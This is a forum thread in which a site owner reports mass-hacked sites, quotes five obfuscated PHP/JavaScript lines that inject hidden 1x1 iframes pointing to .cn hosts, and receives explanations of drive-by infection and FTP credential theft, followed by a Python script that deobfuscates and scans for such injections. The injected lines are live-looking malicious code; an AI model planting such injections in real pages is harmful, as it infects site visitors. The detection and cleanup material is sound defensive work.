Hi, all. All but four of my 29 sites were hacked. Please read all before commenting. I have a bunch of questions.

1.) My 29 sites are on 6 different hosts. Someone thought it was because of my banner rotator; however, sites that DID NOT have the banner rotator on them were hacked also.

2.) Each site has a different password, some as long as this example: "nviXR428#nnbks!Y2".

Now let's talk about the four that were not hacked, or, if they were, for some reason they did not mess with the site that I could find. Two of them were .htm sites. The other two are PHP. One site is a WordPress blog. The other site, a PHP site, has this code in the .htaccess. I bought this site and I did not place this code in the others. Would this code make a difference?

# disable directory browsing
Options All -Indexes
# protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
# disable the server signature
ServerSignature Off
# limit file uploads to 10mb to prevent DoS attacks
LimitRequestBody 10240000
# protect php.ini
<files *.ini>
order allow,deny
deny from all
</files>
# protect config.php
<files config.php>
order allow,deny
deny from all
</files>
# protect cron.php
<files cron.php>
order allow,deny
deny from all
</files>
# protect ping.php
<files ping.php>
order allow,deny
deny from all
</files>
RewriteEngine on
RewriteRule ^MSOffice/(.*)$ / [R=301]
RewriteRule ^_vti_(.*)$ / [R=301]
RewriteRule ^(.*)index.rdf$ /rss.php [R=301]

I have a NEW, just-out-of-the-box computer I am using. I ran Search & Destroy and McAfee. They both say clean. What would your steps be?

Here are the different codes that were placed in the index.php of the sites. Can anyone tell me what they do or mean?

<?php echo '<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>'; ?>
<?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?>
<?php echo '<script>document.write("<if" +"r" +"a"+"m"+"e" +" s"+"r"+"c"+"="+ "h"+ "t"+"t"+"p"+ ":"+ "/"+ "/d"+ "e" +"l"+"z"+"z" +"e" +"r" +"ro" +"."+"c" +"n" +"/ he"+"i" +"g" +"ht="+"1 wid"+"th"+ "="+"1"+">"+"<"+ "/"+"if"+ "r" +"a"+ "me>");</script>'; ?>
<?php echo '<script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script>'; ?>
<?php echo '<script>document.write("<" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c" +"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+ " wi"+ "d" +"th=" +"1></i" +"f"+ "ra"+"m"+"e>");</script>'; ?>

Thanks in advance,
Butterflies Forever,
Sami
Have you checked all of your log files? If someone has gained access to the server then it will be in the logs (unless they modified the logs!). Failing that, it could be down to many things. Might want to secure your file permissions and check for any XSS attempts/vulnerabilities. Make sure all the packages on your server are updated too.
The ol' iframe injection, huh?

How does this hacking take place: This hacking does not take place by any PHP application vulnerability, nor any kernel bug, nor Apache bug, nor cPanel or Plesk bug. The hacker(s) are setting up innocent-looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may have a keylogger that sends the person's passwords etc. to the hacker(s), and moves on. After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the person's computer will be injected and infected. And so the cycle continues.

Solution: Change the FTP password and it will usually stop. The only reason it wouldn't is if a keylogger is on your personal computer, and since you change the password using the same computer, you just gave the passwords back to the hackers again. Just changing the password is not a complete solution, but it is the first step. What's next: your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install any antivirus or anti-spyware which you think could block it. But the best solution is to clean format the computer.

If the innocent visitor has an FTP or root password for any internet sites (perhaps your host is infected?), the hackers use a program that goes to the person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the FTP or root passwords to log in. And since they have at least your account FTP pass, whatever permissions your folders and files are set to make no difference.
I really hope this helps shed some light on the situation. Good luck!
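Two points in the thread are served by one added example that is not from either poster: the first post's question of what the concatenated document.write() lines actually do, and the reply's description of a tool that drops a hidden 1x1 iframe into every index-type page. The script below resolves the "a"+"b"+"c" concatenation to recover the injected HTML, reports each iframe's source host and size, and walks a site tree checking index.* files so a site owner can find every affected page. The sample index.php content is constructed from the delzzerro.cn line quoted in the first post; the function names are my own.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample: the delzzerro.cn injection quoted in the thread, prepended to an
# ordinary index.php body, which is how the hacked files look after the tool has run.
SAMPLE_INDEX = """<?php echo '<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>'; ?>
<?php include 'header.php'; ?>
<h1>Welcome to my site</h1>
"""

WRITE_CALL = re.compile(r'document\.write\((.*?)\)\s*;?\s*</script>', re.S)
JS_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')      # one double-quoted JS literal
IFRAME_TAG = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'(\w+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)')


def rebuild_writes(source):
    """Join the quoted pieces inside each document.write() to get the HTML the browser inserts."""
    return ["".join(JS_STRING.findall(m.group(1))) for m in WRITE_CALL.finditer(source)]


def injected_iframes(source):
    """Return (src host, height, width) for each iframe written by a document.write()."""
    found = []
    for html in rebuild_writes(source):
        for tag in IFRAME_TAG.finditer(html):
            attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag.group(1))}
            host = urlparse(attrs.get("src", "")).hostname or ""
            found.append((host, attrs.get("height", ""), attrs.get("width", "")))
    return found


def is_hidden(height, width):
    """The injections in the thread use height=1 width=1; treat anything that small as hidden."""
    return height.isdigit() and width.isdigit() and int(height) <= 1 and int(width) <= 1


def scan_tree(root):
    """Walk a site tree and list (path, host) for index-type files carrying a hidden iframe."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index."):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for host, height, width in injected_iframes(fh.read()):
                    if is_hidden(height, width):
                        hits.append((path, host))
    return hits
```

Run scan_tree() against a local copy of each site's document root; every hit is a file to restore from a clean backup after the FTP password has been changed from an uninfected machine.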